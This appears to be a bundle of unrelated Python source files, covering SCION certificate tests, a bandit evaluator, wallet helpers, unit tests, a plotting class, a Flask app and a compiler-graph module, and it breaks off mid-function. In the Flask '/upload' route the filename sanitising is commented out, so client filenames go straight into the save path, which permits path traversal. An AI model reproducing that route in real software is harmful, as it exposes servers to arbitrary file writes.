loaded_chain = cert_cp_as.format_certfile()
certs.verify_cp_as_chain(loaded_chain, trcs.decode_trc(trc.trc))
any_none_core.validate_crypto()
def test_broken_delete_one_core_as(self):
# [regression test] Check that validating an invalid / old certificate fails
# against an updated TRC
self._create_ases()
prev = TRC.objects.create(self.isd1)
# remove one core AS
AS.objects.filter(is_core=True, isd=self.isd1).first().delete()
# deleting a core As triggers a generation of a TRC. Get that TRC:
trc = TRC.objects.latest()
# check the trc chain
_check_trc(trc, prev)
# check it's a sensitive update
self.assertEqual(trc.serial_version, prev.serial_version + 1)
self.assertEqual(trc.base_version, prev.base_version)
self.assertEqual(trc.predecessor_trc_or_none(), prev)
self.assertTrue(trc.votes.exists())
self.assertNotEqual(trc.quorum, prev.quorum)
# Check invalid CP AS certificates when selecting old certificate, core
with self.assertRaises(pkicommand.ScionPkiError):
some_core = AS.objects.filter(is_core=True, isd=self.isd1).first()
cert_cp_as = Certificate.objects.filter(key__AS=some_core, key__usage=Key.CP_AS,
key__version=1).get()
loaded_chain = cert_cp_as.format_certfile()
certs.verify_cp_as_chain(loaded_chain, trcs.decode_trc(trc.trc))
# Check invalid CP AS certificates when randomly selecting, non-core
with self.assertRaises(AttributeError):
any_none_core = AS.objects.filter(is_core=False, isd=self.isd1).first()
cert_cp_as = Certificate.objects.filter(key__AS=any_none_core, key__usage=Key.CP_AS,
key__version=1).get()
loaded_chain = cert_cp_as.format_certfile()
# We should never get further, Unreachable code
# The first core AS was deleted and the non-core v1 CP AS cert was referring to
# that core AS CA cert
certs.verify_cp_as_chain(loaded_chain, trcs.decode_trc(trc.trc))
def test_create_less_core_ases(self):
self._create_ases()
prev = TRC.objects.create(self.isd1)
# leave only one core AS
AS.objects.exclude(pk=AS.objects.filter(is_core=True).first().pk).delete()
# deleting core ASes triggers a generation of a TRC. Get that TRC:
trc = TRC.objects.latest()
# check it's a sensitive update
_check_trc(trc, prev)
self.assertEqual(trc.serial_version, prev.serial_version + 1)
self.assertEqual(trc.base_version, prev.base_version)
self.assertEqual(trc.predecessor_trc_or_none(), prev)
self.assertTrue(trc.votes.exists())
self.assertNotEqual(trc.quorum, prev.quorum)
def _create_ases(self):
as1 = _create_AS(self.isd1, 'ff00:0:1', is_core=True)
as2 = _create_AS(self.isd1, 'ff00:0:2', is_core=True)
as3 = _create_AS(self.isd1, 'ff00:0:3', is_core=False)
Key.objects.create_all_keys(as1)
Key.objects.create_all_keys(as2)
Key.objects.create_all_keys(as3)
Certificate.objects.create_all_certs(as1)
Certificate.objects.create_all_certs(as2)
Certificate.objects.create_all_certs(as3)
class WithExpiredCertsTests(TestCase):
def setUp(self):
self.isd1 = ISD.objects.create(isd_id=1, label='Test')
self.as1 = _create_AS(self.isd1, 'ff00:0:1', is_core=True)
def test_create_with_expired_crypto_material(self):
# have the certificates expire before voting and signing.
not_before = datetime.utcnow() - timedelta(days=1)
not_after = not_before + timedelta(seconds=3600)
Key.objects.create_all_keys(self.as1, not_before, not_after)
Certificate.objects.create_all_certs(self.as1)
prev = TRC.objects.create(self.isd1)
# add another core AS.
as2 = _create_AS(self.isd1, 'ff00:0:2', is_core=True)
Key.objects.create_all_keys(as2, not_before, not_after)
Certificate.objects.create_all_certs(as2)
trc = TRC.objects.create(self.isd1)
# despite being created with currently expired material, all is good:
_check_trc(trc, prev)
# and check this is just an update
self.assertEqual(trc.serial_version, prev.serial_version + 1)
self.assertEqual(trc.base_version, prev.base_version)
self.assertEqual(trc.predecessor_trc_or_none(), prev)
self.assertTrue(trc.votes.exists())
def test_create_with_not_overlapping_crypto_material(self):
# create a prev. TRC and update it with a TRC whose validity doesn't overlap with prev.
not_before = datetime.utcnow()
not_after = not_before + timedelta(days=1)
Key.objects.create_core_keys(self.as1, not_before, not_after)
Certificate.objects.create_core_certs(self.as1)
prev = TRC.objects.create(self.isd1)
# add another core AS.
as2 = _create_AS(self.isd1, 'ff00:0:2', is_core=True)
not_before = not_after + timedelta(microseconds=100)
not_after = not_before + timedelta(days=1)
Key.objects.create_core_keys(as2, not_before=not_before, not_after=not_after)
Certificate.objects.create_core_certs(as2)
# and refresh the crypto material of as1
Key.objects.create_core_keys(self.as1, not_before, not_after)
Certificate.objects.create_core_certs(self.as1)
trc = TRC.objects.create(self.isd1)
# we should get a base TRC
_check_trc(trc, trc)
self.assertEqual(trc.serial_version, prev.serial_version + 1)
self.assertEqual(trc.base_version, trc.serial_version)
self.assertEqual(trc.predecessor_trc_or_none(), trc)
self.assertFalse(trc.votes.exists())
class WithNewCoreASesTests(TestCase):
def test_delete_all_core_ases(self):
isd1 = ISD.objects.create(isd_id=1, label='Test')
as1 = _create_AS(isd1, 'ff00:0:1', is_core=True)
as1.update_keys_certs()
trc1 = TRC.objects.create(isd1)
self.assertIsNotNone(trc1)
self.assertEqual(trc1.base_version, trc1.serial_version) # base TRC
_check_trc(trc1, trc1)
# delete all ASes in the ISD, and then create new ones with different ID
AS.objects.filter(isd=isd1).delete()
as2 = _create_AS(isd1, 'ff00:0:2', is_core=True)
as2.update_keys_certs()
trc2 = TRC.objects.create(isd1)
self.assertIsNotNone(trc2)
self.assertEqual(trc2.serial_version, trc1.serial_version + 1)
self.assertEqual(trc2.base_version, trc1.base_version) # just an update
_check_trc(trc2, trc1) # sufficient to verify votes and signatures
def _create_AS(isd, as_id, is_core=False):
as_ = AS(isd=isd, as_id=as_id, as_id_int=as_ids.parse(as_id), is_core=is_core)
as_.save()
return as_
def _create_TRC(isd, serial, base):
# avoid using the create methods from the TRCManager
trc = TRC(isd=isd, not_before=datetime.utcnow(), not_after=datetime.utcnow(),
base_version=base, serial_version=serial)
trc.save()
return trc
def _get_voters_indices(trc):
""" uses the certificate indices of the previous TRC to indicate who voted """
prev = trc.predecessor_trc_or_none()
if prev is None:
return None
return prev.get_certificate_indices(trc.votes.all())
def _check_trc(trc, anchor):
""" Verify a TRC, raises on error """
trcs.verify_trcs(trcs.decode_trc(anchor.trc), trcs.decode_trc(trc.trc))
|
#!/usr/bin/env python2.7
import sys
import gzip
import hideSomePolicyLinUCB as policy # This is your policy file.
# This script loads a subset of the original yahoo data (e.g. 1 day of log data, which corresponds to 4.5 million log files)
def read_articles(path):
articles = {}
with file(path) as inf:
for line in inf:
tokens = line.strip().split()
articles[int(tokens[0])] = [float(x) for x in tokens[1:]]
policy.set_articles(articles)
def process(path):
clicked, lines_evaluated, lines_total = 0, 0, 0
with gzip.open(path, 'rb') as inf:
for line in inf:
lines_total += 1
# Parsing the log line.
logline = line.strip().split()
chosen = int(logline.pop(1))
user_action = int(logline.pop(1))
time = int(logline[0])
if chosen == 109528:
continue
user_features = [None]*6
for feat in logline[2:8]:
user_features[int(feat[0])-1] = float(feat[2:])
articles = []
for feat in logline[8:]:
if feat[0] == '|':
article_id = int(feat[1:])
if article_id != 109528:
articles.append(article_id)
# Getting the recommended article.
calculated = policy.reccomend(time, user_features, articles)
if not calculated in articles:
raise Exception("Article was not in the list.")
# Updating the policy.
if calculated == chosen:
policy.update(user_action)
clicked += user_action
lines_evaluated += 1
else:
policy.update(-1)
if lines_total % 10000 == 0:
print "Evaluated %d/%d lines.\tCTR = %f\t%f%% done" % (lines_evaluated, lines_total, float(clicked) / lines_evaluated, 100.0/4680000.0*lines_total)
print "Evaluated %d/%d lines." % ( lines_evaluated, lines_total)
print "CTR=%f" % (float(clicked) / lines_evaluated)
if __name__ == "__main__":
if len(sys.argv) != 3:
print "Usage: ./evaluator.py articles log"
sys.exit(-1)
read_articles(sys.argv[1])
process(sys.argv[2])
|
"""
used to check the wallet information of any wallet id.
This class can be used to get a wallet balance
"""
import time
class WalletInfo:
@staticmethod
def get_wallet_balance_info(admin_inst, wallet_id):
"""
Is sent to client when requesting for balance
:param admin_inst:
:param wallet_id:
:return:
"""
# returns [available tokens, reserved tokens, total tokens]
confirmed_balance = admin_inst.get_db_manager().get_from_wallet_balances_db(wallet_id=wallet_id)
# {tx_hash: [tx_type, "sender" or "receiver, main_tx, sig,fee, amt_tokens(sender=neg., receiver=pos.]}
pending_txs = WalletInfo.get_pending_transactions(admin_inst=admin_inst, wallet_id=wallet_id)
return [confirmed_balance, pending_txs]
@staticmethod
def get_pending_transactions(admin_inst, wallet_id):
# {tx_hash: [tx_type, "sender" or "receiver, main_tx, sig,fee, amt_tokens(sender=neg., receiver=pos.]}
return admin_inst.get_db_manager().get_from_unconfirmed_db_wid(
wallet_id=wallet_id
)
@staticmethod
def get_lesser_of_wallet_balance(admin_inst, wallet_id):
"""
This is used internally to get the lesser of balance.
Either the balance found on the blockchain is used OR balance of blockchain + tokens sent/received
lesser_of_bal = confirmed_bal if confirmed_bal < pending_bal else pending_bal
:param admin_inst:
:param wallet_id:
:return:
"""
confirmed_bal, pending_txs= WalletInfo.get_wallet_balance_info(admin_inst, wallet_id)
confirmed_bal = confirmed_bal[0] # select only available bal
token_change = 0
for activity in pending_txs.values():
# tkn amount fee These will be negative if wallet_id was sender and positive if receiver
token_change += activity[-1]+activity[-2]
pending_bal = confirmed_bal + token_change
return confirmed_bal if confirmed_bal < pending_bal else pending_bal
@staticmethod
def get_wallet_bcw_info(admin_inst, wallet_id):
# [hash of rsv_req tx, rsv req dict, signature, amount reserved, timestamp of reservation exp]
wallet_bcw = admin_inst.get_db_manager().get_from_bcw_db(wallet_id=wallet_id)
return wallet_bcw
@staticmethod
def get_if_wallet_a_bcw(admin_inst, wallet_id):
"""
Check if wallet is a blockchain connected wallet
:param admin_inst:
:param wallet_id:
:return:
"""
wallet_bcw = WalletInfo.get_wallet_bcw_info(admin_inst=admin_inst, wallet_id=wallet_id)
return True if wallet_bcw else False
@staticmethod
def check_remaining_reservation_time(admin_inst, wallet_id):
"""
:param admin_inst:
:param wallet_id:
:return: int: representing remaining time Or None if wallet is not a BCW
"""
wallet_bcw_entry = WalletInfo.get_wallet_bcw_info(admin_inst, wallet_id)
if wallet_bcw_entry:
return wallet_bcw_entry[-1] - int(time.time())
else:
return None
|
# coding=utf-8
# Copyright 2019 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for subword_text_encoder_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensor2tensor.data_generators.ops import subword_text_encoder_ops
import tensorflow as tf
vocab_file = (
"third_party/py/tensor2tensor/data_generators/ops/testdata/subwords")
class SubwordTextEncoderOpsTest(tf.test.TestCase):
def test_subword_text_encoder_encode(self):
s = "the quick brown fox jumps over the lazy dog"
encoded = subword_text_encoder_ops.subword_text_encoder_encode(
s, vocab_file)
self.assertAllEqual(encoded, [2, 3, 4, 5, 6, 7, 8, 9, 2, 11, 12, 1])
if __name__ == "__main__":
tf.enable_eager_execution()
tf.test.main()
|
#!/usr/bin/env python
import unittest
from icecube import dataclasses
from icecube import icetray
from icecube.icetray import OMKey
class TestI3FlasherInfo(unittest.TestCase):
def test_I3FlasherInfo_equality(self):
fi1 = dataclasses.I3FlasherInfo()
fi2 = dataclasses.I3FlasherInfo()
fi1.flashing_om = OMKey(2,1,0)
fi2.flashing_om = OMKey(2,1,0)
fi1.flash_time = 1.0
fi2.flash_time = 1.0
fi1.atwd_bin_size = 1.0
fi2.atwd_bin_size = 1.0
fi1.led_brightness = 1
fi2.led_brightness = 1
fi1.mask = 1
fi2.mask = 1
fi1.width = 1
fi2.width = 1
fi1.rate = 1
fi2.rate = 1
fi1.raw_atwd3 = [ 1, 2, 3 ]
fi2.raw_atwd3 = [ 1, 2, 3 ]
self.assertTrue(fi1==fi2, "this should be true.")
def test_I3FlasherInfo_inequality(self):
fi1 = dataclasses.I3FlasherInfo()
fi2 = dataclasses.I3FlasherInfo()
fi1.flashing_om = OMKey(3,1,0)
fi2.flashing_om = OMKey(2,1,0)
fi1.flash_time = 1.0
fi2.flash_time = 1.0
fi1.atwd_bin_size = 1.0
fi2.atwd_bin_size = 1.0
fi1.led_brightness = 1
fi2.led_brightness = 1
fi1.mask = 1
fi2.mask = 1
fi1.width = 1
fi2.width = 1
fi1.rate = 1
fi2.rate = 1
fi1.raw_atwd3 = [ 1, 2, 3 ]
fi2.raw_atwd3 = [ 1, 2, 3 ]
self.assertFalse(fi1==fi2, "this should be false.")
unittest.main()
|
from matplotlib import pyplot as plt
import json
import pandas as pd
from shapely.geometry.point import Point
from shapely import affinity
from matplotlib.patches import Polygon
import random
import numpy as np
from sklearn.cluster import KMeans
from sklearn.metrics import pairwise_distances_argmin_min
def shapely_ellipse(center,dims,scale,angle):
circ = Point(center).buffer(1)
elld = affinity.scale(circ, dims[0], dims[1])
ellr = affinity.rotate(elld, angle)
ells = affinity.scale(ellr, scale[0], scale[1])
return ells
def create_elipse(x,y,ax,color,n_std):
cov = np.cov(x, y)
pearson = cov[0, 1]/np.sqrt(cov[0, 0] * cov[1, 1])
width = (np.sqrt(1 + pearson))
height = (np.sqrt(1 - pearson))
x_center = np.mean(x)
y_center = np.mean(y)
scale_x = np.sqrt(cov[0, 0]) * n_std
scale_y = np.sqrt(cov[1, 1]) * n_std
ellipse_obj = shapely_ellipse((x_center,y_center),(width,height),(scale_x, scale_y),45)
verts1 = np.array(ellipse_obj.exterior.coords.xy)
patch = Polygon(verts1.T, facecolor=color,edgecolor='black', alpha=0.15)
return ellipse_obj, ax.add_patch(patch)
def estimate_center(x_all,y_all):
X = np.concatenate((x_all.reshape(-1, 1), y_all.reshape(-1, 1)), axis=1)
km = KMeans(n_clusters=1).fit(X)
closest, _ = pairwise_distances_argmin_min(km.cluster_centers_, X)
return list(x_all).pop(closest[0]), list(y_all).pop(closest[0]), closest[0]
def get_inter(e1,e2):
return e1.intersection(e2).area/e2.area
##########################################################################################
class smurf_system_analysis():
def __init__(self,n_systems=4,ref_system=0,in_file='results/smurf_scores.json'):
self.n_systems = n_systems
self.ref_system = ref_system
self.in_file = in_file
def load_standardized_scores(self,estimates_file='smurf/standardize_estimates.txt'):
stand_in = open(self.in_file, "r")
metric_scores = json.load(stand_in)
estimates = pd.read_csv(estimates_file, header=None)
sem_ind = list(estimates[0]).index('SPARCS')
qual_ind = list(estimates[0]).index('SPURTS')
gram_ind = list(estimates[0]).index('MIMA')
self.stand_SPARCS = (metric_scores["SPARCS"] - estimates.loc[sem_ind, 1]) / estimates.loc[sem_ind, 2]
self.stand_SPURTS = (metric_scores["SPURTS"] - estimates.loc[qual_ind, 1]) / estimates.loc[qual_ind, 2]
self.stand_MIMA = (metric_scores["MIMA"] - estimates.loc[gram_ind, 1]) / estimates.loc[gram_ind, 2]
def compute_grammar_penalities(self,outlier_thres=-1.96):
penalties = []
for i in range(0,self.n_systems):
gram_penalty = self.stand_MIMA[i::self.n_systems] - outlier_thres
gram_penalty[gram_penalty > 0] = 0
penalties.append(np.sum(gram_penalty))
return penalties
def print_ellipse_intersections(self):
iter = list(np.arange(self.n_systems))
cand_systems = iter[:self.ref_system] + iter[self.ref_system + 1:]
intersections = []
for i in cand_systems:
print('Intersection ' + str(i) + ' = ' + str(get_inter(self.ellipse[self.ref_system],self.ellipse[i])))
return intersections
def generate_plot(self,colors,out_file='results/system_plot.png',num_random_pts=100,seed=10,n_std=1.15):
assert len(colors) == self.n_systems
random.seed(seed)
fig = plt.figure(0)
ax = fig.add_subplot(111, aspect='equal')
self.ellipse = []
center_x = []
center_y = []
estimate_set = []
for i in range(0,self.n_systems):
x_all = self.stand_SPARCS[i::self.n_systems]
y_all = self.stand_SPURTS[i::self.n_systems]
estimate_x, estimate_y, estimate_index = estimate_center(x_all,y_all)
center_x.append(estimate_x)
center_y.append(estimate_y)
estimate_set.append(estimate_index)
rand_set = []
for _ in range(0,num_random_pts):
num_pts = int(len(self.stand_SPARCS)/self.n_systems)
rand_set.append(random.choice([i for i in range(0,num_pts) if i not in estimate_set+rand_set]))
for i in range(0, self.n_systems):
x_all = self.stand_SPARCS[i::self.n_systems]
y_all = self.stand_SPURTS[i::self.n_systems]
x = [x_all[j] for j in rand_set]
y = [y_all[j] for j in rand_set]
self.ellipse.append(create_elipse(x_all,y_all, ax, colors[i], n_std)[0])
ax.scatter(x,y,5,c=colors[i])
for i in range(0,self.n_systems):
ax.scatter(center_x[i],center_y[i],s=60,c=colors[i],marker='^',edgecolors='black')
self.print_ellipse_intersections()
ax.set_xlim(-2,2)
ax.set_ylim(-2,2)
plt.xlabel('SPARCS (Semantic Score)')
plt.ylabel('SPURTS (Style Score)')
plt.savefig(out_file)
plt.show() |
import tkinter as tk
def print_txtval():
val_en =en.get()
print(val_en)
root = tk.Tk()
root.title('get text box')
root.geometry('350x150')
lb= tk.Label(text='Label')
en=tk.Entry()
bt= tk.Button(text='button',command=print_txtval)
lb.pack()
en.pack()
bt.pack()
root.mainloop() |
def f(x):
"""
Parameters:
x: foo
""" |
from queue import Queue
from threading import Thread, Event
class Task:
"""Task to obtain function for thread pool to run"""
def __init__(self, **kargs):
self.kargs = kargs
self.event = Event()
def do(self):
pass
def task_complete(self):
self.event.set()
def wait_for_task_done(self, timout = None):
return self.event.wait(timout)
class Worker(Thread):
"""Thread executing tasks from a given tasks queue"""
def __init__(self, tasks):
Thread.__init__(self)
self.tasks = tasks
self.daemon = True
self.doing = True
def run(self):
while self.doing:
try:
task = self.tasks.get(True, 1)
try:
task.do()
task.task_complete()
except Exception as taskex:
print("__exception: ", str(taskex), taskex.args)
self.tasks.task_done()
except: # no item to get
pass
def stop(self):
self.doing = False
class ThreadPool:
"""Pool of threads consuming tasks from a queue"""
def __init__(self, num_threads, max_queue_size):
self.tasks = Queue(max_queue_size)
self.threads = []
idx = 0
while idx < num_threads:
self.threads.append(Worker(self.tasks))
idx = idx + 1
def start_pool(self):
for idx in range(len(self.threads)):
self.threads[idx].start()
def stop_pool(self):
for idx in range(len(self.threads)):
self.threads[idx].stop()
for idx in range(len(self.threads)):
self.threads[idx].join()
def add_task(self, task):
self.tasks.put(task)
def wait_completion(self):
"""Wait for completion of all the tasks in the queue"""
self.tasks.join()
|
import json
import warnings
def read_scenario(path="scenarios/rimea6.scenario"):
"""
Loads a scenario file with json
:param path: the path of the scenario file
:return: the dictionary containing the scenario's data
"""
with open(path, 'r') as f:
scenario = json.load(f)
return scenario
def add_pedestrian(scenario=None, scenario_path=None, out_scen_name=None, output_path=None, id=None,
find_min_free_id=True, targetIds=[], radius=0.2, densityDependentSpeed=False,
speedDistributionMean=1.34, speedDistributionStandardDeviation=0.26, minimumSpeed=0.5,
maximumSpeed=2.2, acceleration=2.0, footstepHistorySize=4, searchRadius=1.0,
walkingDirectionCalculation="BY_TARGET_CENTER", walkingDirectionSameIfAngleLessOrEqual=45.0,
nextTargetListIndex=0, position=(0, 0), velocity=(0, 0), freeFlowSpeed=1.8522156059160915,
followers=[], idAsTarget=-1, infectionStatus="SUSCEPTIBLE", lastInfectionStatusUpdateTime=-1.0,
pathogenAbsorbedLoad=0.0, groupIds=[], groupSizes=[], agentsInGroup=[], traj_footsteps=[]):
"""
Add a pedestrian in a scenario.
:param scenario: the dictionary containing the data of the scenario where a pedestrian needs to be added
:param scenario_path: the path to a scenario file to be read (alternative to :param scenario:)
:param output_path: the path where to save the new scenario file
:param out_scen_name: name of the output scenario
All the other parameters are the ones to be written in the pedestrian's json file section.
"""
# 'scenario' and 'scenario_path' cannot be both None
if scenario_path is None and scenario is None:
raise AttributeError("One of 'scenario' and 'scenario_path' must be not None, got both None")
# if the scenario path is not passed, than an output path is mandatory (otherwise the scenario path is used as output path too)
elif scenario_path is None and output_path is None:
raise AttributeError("One of 'scenario_path' and 'output_path' must be not None, got both None")
# if both the scenario and its path are passed, only the scenario is going to be used and the path is ignored
elif scenario_path is not None and scenario is not None:
msg = "Both the scenario and the path to its file were passed to the function 'add_pedestrian'. " \
"Only the scenario is going to be used, it will not be read again from file"
warnings.warn(msg, RuntimeWarning)
# if scenario_path is not None, read the scenario from file
if scenario_path is not None:
scenario = read_scenario(scenario_path)
# if the pedestrian's id is not passed, find a free one
if id is None:
id = find_free_id(scenario, find_min_free_id=True)
# if target id not provided, if there is only 1 target, use its id, otherwise don't set one (pedestrian won't move)
if not targetIds and len(scenario['scenario']['topography']['targets']) == 1:
targetIds = [scenario['scenario']['topography']['targets'][0]['id']]
# create a dictionary with the pedestrian's data (in the format used in the scenario's json file)
ped = {
"attributes": {
"id": id,
"radius": radius,
"densityDependentSpeed": densityDependentSpeed,
"speedDistributionMean": speedDistributionMean,
"speedDistributionStandardDeviation": speedDistributionStandardDeviation,
"minimumSpeed": minimumSpeed,
"maximumSpeed": maximumSpeed,
"acceleration": acceleration,
"footstepHistorySize": footstepHistorySize,
"searchRadius": searchRadius,
"walkingDirectionCalculation": walkingDirectionCalculation,
"walkingDirectionSameIfAngleLessOrEqual": walkingDirectionSameIfAngleLessOrEqual
},
"source": None,
"targetIds": targetIds,
"nextTargetListIndex": nextTargetListIndex,
"isCurrentTargetAnAgent": False,
"position": {
"x": float(position[0]),
"y": float(position[1])
},
"velocity": {
"x": velocity[0],
"y": velocity[1]
},
"freeFlowSpeed": freeFlowSpeed,
"followers": followers,
"idAsTarget": idAsTarget,
"isChild": False,
"isLikelyInjured": False,
"psychologyStatus": {
"mostImportantStimulus": None,
"threatMemory": {
"allThreats": [],
"latestThreatUnhandled": False
},
"selfCategory": "TARGET_ORIENTED",
"groupMembership": "OUT_GROUP",
"knowledgeBase": {
"knowledge": [],
"informationState": "NO_INFORMATION"
},
"perceivedStimuli": [],
"nextPerceivedStimuli": []
},
"healthStatus": {
"infectionStatus": infectionStatus,
"lastInfectionStatusUpdateTime": lastInfectionStatusUpdateTime,
"pathogenAbsorbedLoad": pathogenAbsorbedLoad,
"startBreatheOutPosition": None,
"respiratoryTimeOffset": -1.0,
"breathingIn": False,
"pathogenEmissionCapacity": -1.0,
"pathogenAbsorptionRate": -1.0,
"minInfectiousDose": -1.0,
"exposedPeriod": -1.0,
"infectiousPeriod": -1.0,
"recoveredPeriod": -1.0
},
"groupIds": groupIds,
"groupSizes": groupSizes,
"agentsInGroup": agentsInGroup,
"trajectory": {"footSteps": traj_footsteps},
"modelPedestrianMap": None,
"type": "PEDESTRIAN"
}
# "scenario['scenario']['topography']['dynamicElements']" gives the list of the pedestrians in the scenario;
# append to it the new pedestrian just created
scenario['scenario']['topography']['dynamicElements'].append(ped)
if output_path is None: # if output_path is None, use scenario_path
output_path = scenario_path
elif not output_path.endswith(".scenario"): # add ".scenario" suffix to the output path if not present
output_path += ".scenario"
if out_scen_name is not None:
scenario['name'] = out_scen_name
# write the scenario file with the new pedestrian
with open(output_path, 'w') as f:
json.dump(scenario, f, indent=' ')
def find_free_id(scenario: dict, find_min_free_id=True):
"""
Find a free id for a new pedestrian/target
:param scenario: dictionary containing a scenario's data
:param find_min_free_id: if True, finds the minimum free id (less efficient), otherwise simply a free id (more efficient)
:return: a free id (int)
"""
busy_ids = set()
# iterate over pedestrians to collect their (already busy) ids
dynamic_elems = scenario['scenario']['topography']['dynamicElements']
for elem in dynamic_elems:
if elem['type'] == 'PEDESTRIAN':
busy_ids.add(elem['attributes']['id'])
# iterate over targets to collect their (already busy) ids
targets = scenario['scenario']['topography']['targets']
for t in targets:
busy_ids.add(t['id'])
if not find_min_free_id:
return max(busy_ids) + 1 # simply return the max busy id + 1 (which will be free)
# otherwise sort the busy ids and find the minimum free one
sorted_ids = sorted(list(busy_ids))
try:
# in case sorted_ids is empty, this would cause an IndexError
prev_id = sorted_ids[0]
for id in sorted_ids[1:]:
if abs(id - prev_id) > 1:
return prev_id + 1
# if the end of the list has been reached without finding a free id, return the max id + 1
return sorted_ids[-1] + 1
except IndexError:
# it means the list of ids is empty, so return simply 1
return 1
if __name__ == '__main__':
add_pedestrian(
scenario_path="../task1/scenarios/rimea6.scenario",
out_scen_name="task3",
output_path="scenarios/task3.scenario",
position=(8, 2),
targetIds=[5]
)
|
a,b = 0,1
for i in xrange(1,11):
print a
a,b = b,a+b
# #mod
# for i in xrange(1,11):
# print i%2
# #xrange
# for i in xrange(1,10):
# print i
# print "--------------"
# #range
# for i in range(1,10):
# print i
# print "--------------"
# #while
# i = 0
# while i<=10:
# print i
# i += 1
|
import logging
import os
import socket
from flask import request, render_template, jsonify
from redis import Redis
from . import main_blue
redis = Redis(host="redis")
logger = logging.getLogger("app.access")
ALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif', "xlsx", "xls", "log"}
@main_blue.route('/')
def index():
return "It worked!"
@main_blue.route('/ping')
def ping():
return jsonify({"ping": "pong"})
@main_blue.route('/redis')
def hello():
redis.incr('hits')
return 'Hello Container World! I have been seen %s times and my hostname is %s.\n' % (
redis.get('hits'), socket.gethostname())
@main_blue.route('/get_version')
def get_version():
latest_version = 1
return jsonify({"version": latest_version})
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@main_blue.route('/upload', methods=['GET', 'POST'])
def transfer():
if request.method != 'POST':
return render_template("transfer.html")
if 'file' not in request.files:
return {"msg": "No file part."}
file = request.files['file']
# if user does not select file, browser also
# submit an empty part without filename
if file.filename == '':
return {"msg": "No selected file."}
if file and allowed_file(file.filename):
print(file.filename)
# filename = secure_filename(file.filename)
filename = file.filename
file.save(os.path.join("/uploads", os.path.join(".", filename)))
return {"status": 1}
return {"msg": "file error."}
|
import pgzrun
# Spacewalk # by Sean McManus # www.sean.co.uk / www.nostarch.com
WIDTH = 800
HEIGHT = 600
player_x = 600
player_y = 350
def draw():
screen.blit(images.backdrop, (0, 0))
pgzrun.go() |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from eospac.base import EosUnits
from eospac import EosMaterial
from eospac.feos import FeosMaterial
import eospac.feos.interface
import numpy as np
from eospac.base import eV2K_cst
from numpy.testing import assert_allclose
def is_equal(x,y):
assert x == y
def test_low_level():
""" Check consistency"""
maxwell_temps = np.logspace(-4, 1, 50)
rho = np.logspace(-4, 1, 10)
temp = np.logspace(-3, 3, 10)
use_maxwell = 1
table_handle = 1
use_softsphere = 1
matid = 3719
my_opts ={'use_maxwell': True, 'use_softspheres': True,
'maxwell_temp_arr': None, 'max_materials': 2,
'grid_subsample_default': 0}
mat1 = FeosMaterial(matid, tables=['.*_DT'], options=my_opts, units='cgs')
D_arr, T_arr = mat1.Pt_DT['D_Array'], mat1.Pt_DT['T_Array']
D, T = np.meshgrid(D_arr, T_arr, indexing='ij')
#print mat1.Pt_DT(D, T).min()
#print mat1.Ut_DT(D, T).min()
#Nel, N_maxwell_iso, Maxwell_T_reliable = _init_mat(table_handle, matid, use_maxwell, use_softsphere, maxwell_temps)
#res = _get_eos_all(table_handle, Nel, use_maxwell, rho, temp)
#res2 = _get_eos(table_handle, 0, Nel, use_maxwell, rho, temp)
#yield assert_allclose, res['Pt'], res2['P']
#print _get_mat_par(table_handle, Nel)
#print _get_crit_point(table_handle)
#print _get_soft_shere_par(table_handle)
|
x = 9
print(x * x)
|
"""
Functions related to inspecting Program objects/classes in a graph.
"""
import json
from .base import Program, SourceCodeProgram, IntermediateProgram
from .base import MachineProgram, get_program_classes
def get_targets(program):
""" Get the program names that the given Program instance/subclass
can be compiled to.
"""
subclasses = get_program_classes()
if isinstance(program, str):
program = get_program_classes()[program.lower()]
cls = program
if not isinstance(cls, type):
cls = type(program)
if not issubclass(cls, Program):
raise TypeError('get_targets() needs Program instance or class.')
targets = set()
for method_name in dir(cls):
if method_name.startswith('to_') and \
callable(getattr(cls, method_name)):
prog_name = method_name[3:]
if prog_name in subclasses:
targets.add(prog_name)
return targets
def get_program_graph():
""" Produce a networkx graph where the nodes are language names and the
(directed) edges represent compilers.
"""
from ppci.utils import graph
IGNORE = '', 'sourcecode', 'intermediate', 'machine'
subclasses = get_program_classes()
g = graph.DiGraph()
for name in subclasses.keys():
if name not in IGNORE:
g.add_node(name)
for name, programClass in subclasses.items():
for target in get_targets(programClass):
g.add_edge(name, target)
return g
def mcp(program, target_name):
""" Find the chain of representations to go from the given Program instance
to the target language. Returns None if no path was found.
This is essentially the Minimum Cost Path algorithm, and we can
improve this to weight costs in various ways.
"""
subclasses = get_program_classes()
# Init front list of (cost, program1, program2, ...)
front = [(1, program.language, tgt) for tgt in get_targets(program)]
chains = [] # valid chains, sorted by length
visited = set()
visited.add(program.language)
while True:
# Are any chains finished?
for i in reversed(range(len(front))):
chain = front[i]
if chain[-1] == target_name:
chains.append(chain[1:]) # skip costs
front.pop(i)
# Are we finished?
if not front:
break
# Expand front to target of each node in the front
new_visited = set()
for i in reversed(range(len(front))):
chain = front.pop(i)
program = subclasses[chain[-1]]
for tgt in get_targets(program): # For each target
if tgt not in visited:
new_chain = (chain[0] + 1, ) + chain[1:] + (tgt, )
front.append(new_chain)
new_visited.add(tgt)
visited.update(new_visited)
if not new_visited:
break
return chains
def get_program_classes_by_group():
""" Return programs classes in three groups (source code, ir, machine code),
sorted by language name, and with base classes excluded.
"""
program_classes = get_program_classes()
programs1, programs2, programs3 = [], [], []
for program in sorted(program_classes.values(), key=lambda p: p.language):
if program in (
Program, SourceCodeProgram, IntermediateProgram,
MachineProgram):
pass
elif issubclass(program, SourceCodeProgram):
programs1.append(program)
elif issubclass(program, IntermediateProgram):
programs2.append(program)
elif issubclass(program, MachineProgram):
programs3.append(program)
return programs1, programs2, programs3
def get_program_classes_html():
""" Generate html to show program classes in a graph.
"""
program_classes = get_program_classes()
programs1, programs2, programs3 = get_program_classes_by_group()
html = ''
# Create elements
columns = []
